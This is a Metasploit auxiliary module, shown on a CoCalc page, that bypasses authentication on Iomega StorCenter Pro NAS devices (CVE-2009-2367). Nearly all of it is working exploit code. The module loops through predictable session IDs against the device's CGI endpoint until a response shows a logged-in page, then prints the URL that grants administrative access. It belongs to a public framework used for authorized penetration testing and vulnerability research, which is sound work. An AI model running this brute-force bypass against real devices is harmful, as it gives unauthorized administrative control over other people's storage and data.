CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::HttpClient
8

9
  def initialize
10
    super(
11
      'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',
12
      'Description' => %q{
13
        The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,
14
        allowing for simple brute force attacks to bypass authentication and gain administrative
15
        access.
16
        },
17
      'References' => [
18
        [ 'OSVDB', '55586' ],
19
        [ 'CVE', '2009-2367' ],
20
      ],
21
      'Author' => [ 'aushack' ],
22
      'License' => MSF_LICENSE
23
    )
24

25
    register_options(
26
      [
27
        OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])
28
      ]
29
    )
30
  end
31

32
  def run
33
    datastore['SID_MAX'].times do |x|
34
      print_status("Trying session ID #{x}")
35

36
      res = send_request_raw({
37
        'uri' => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",
38
        'method' => 'GET'
39
      }, 25)
40

41
      if (res && res.to_s =~ (/Log out/))
42
        print_status("Found valid session ID number #{x}!")
43
        print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}")
44
        break
45
      end
46
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
47
      print_error("Unable to connect to #{rhost}:#{rport}")
48
      break
49
    rescue ::Timeout::Error, ::Errno::EPIPE
50
    end
51
  end
52
end
53

54